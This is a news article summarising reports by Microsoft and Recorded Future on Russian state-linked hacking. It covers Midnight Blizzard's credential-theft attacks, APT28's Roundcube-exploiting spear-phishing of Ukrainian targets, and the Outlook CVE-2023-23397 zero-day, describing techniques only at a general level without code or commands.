Microsoft has recently revealed a significant spike in credential-stealing attacks orchestrated by Midnight Blizzard, a Russian state-affiliated hacker group.
These intrusions, which cleverly employed residential proxy services to conceal the source IP addresses, specifically targeted governments, IT service providers, NGOs, defense establishments, and critical manufacturing sectors. Midnight Blizzard, also known as Nobelium, operates under various aliases such as APT29, Cozy Bear, Iron Hemlock, and The Dukes.
Despite being exposed in the infamous SolarWinds supply chain compromise, this highly determined group continues to utilize covert techniques to infiltrate foreign ministries and diplomatic entities, solidifying its position as a formidable actor in the world of espionage.
Unseen Tooling and Unyielding Operations
Midnight Blizzard’s persistence in maintaining its operations while evading detection is evident through its reliance on undisclosed tools in targeted attacks. Microsoft, in a series of tweets, explained that these credential attacks involve a range of techniques, including password spraying, brute-force attacks, and token theft.
Additionally, the group employed session replay attacks to gain initial access to cloud resources by leveraging stolen sessions obtained through illicit sales. The use of residential proxy services by APT29 further helped obfuscate malicious traffic and conceal connections established with compromised credentials. This fleeting use of IP addresses poses significant challenges in identifying the scope of the attacks and implementing effective remediation strategies.
New Spear-Phishing Campaign by APT28
Recorded Future, a cybersecurity company, recently uncovered a spear-phishing campaign orchestrated by APT28, also known as BlueDelta, Forest Blizzard, FROZENLAKE, Iron Twilight, and Fancy Bear.
This campaign primarily targeted government and military entities in Ukraine since November 2021.
The attacks leveraged emails with attachments that exploited multiple vulnerabilities in the open-source Roundcube webmail software. By successfully breaching the defenses, Russian military intelligence hackers deployed rogue JavaScript malware, redirecting incoming emails of targeted individuals to an email address under their control, and stealing contact lists.
The campaign demonstrated thorough planning, effectively weaponizing news content as bait, with subject lines and content mirroring legitimate media sources, all focused on Ukraine-related themes.
Unveiling the Russian Cyberwarfare Operations
The recent discoveries regarding Midnight Blizzard and APT28 coincide with another set of attacks that exploited a zero-day flaw in Microsoft Outlook (CVE-2023-23397).
Microsoft disclosed this vulnerability, which was exploited by Russia-based threat actors in limited targeted attacks against European organizations. The privilege escalation vulnerability was promptly addressed in the Patch Tuesday updates released in March 2023.
These findings highlight the relentless efforts of Russian threat actors in gathering valuable intelligence across Europe, particularly after the full-scale invasion of Ukraine in February 2022.
The cyberwarfare operations targeting Ukrainian entities have been characterized by the widespread deployment of wiper malware designed to erase and destroy data, establishing one of the earliest instances of large-scale hybrid conflict.
Conclusion
With the disclosure of Midnight Blizzard’s escalating credential-stealing attacks and APT28’s spear-phishing campaign, Microsoft and Recorded Future shed light on the persistent threat posed by Russian hackers.
The ability of these threat actors to adapt, utilize covert techniques, and exploit vulnerabilities showcases their unwavering determination in conducting espionage activities.
As the international community faces evolving cyber threats, robust defenses and proactive measures are imperative to safeguard governments, organizations, and critical infrastructure from these formidable adversaries.